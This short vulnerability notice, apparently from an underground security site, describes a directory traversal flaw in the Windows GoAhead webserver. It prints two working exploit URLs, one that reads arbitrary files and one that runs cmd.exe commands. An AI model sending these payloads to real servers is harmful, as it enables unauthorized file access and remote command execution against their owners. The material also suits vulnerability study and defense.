-----[ www.TheCyberUnderground.com

GoAhead Webserver Vulnerabilities

The GoAhead webserver (for Windows platforms) has two vulnerabilities, that allow a remote attacker to browse the file
system and execute arbitrary commands.

A specially crafted URL composed of '..\' sequences along with the known filename will disclose the requested file. This 
vulnerability will also allow an attacker to execute arbitrary code with root privileges.

Gaining access to a known file:

http://target/..\..\..\..\..\..\filename

Executing arbitrary commands:

http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\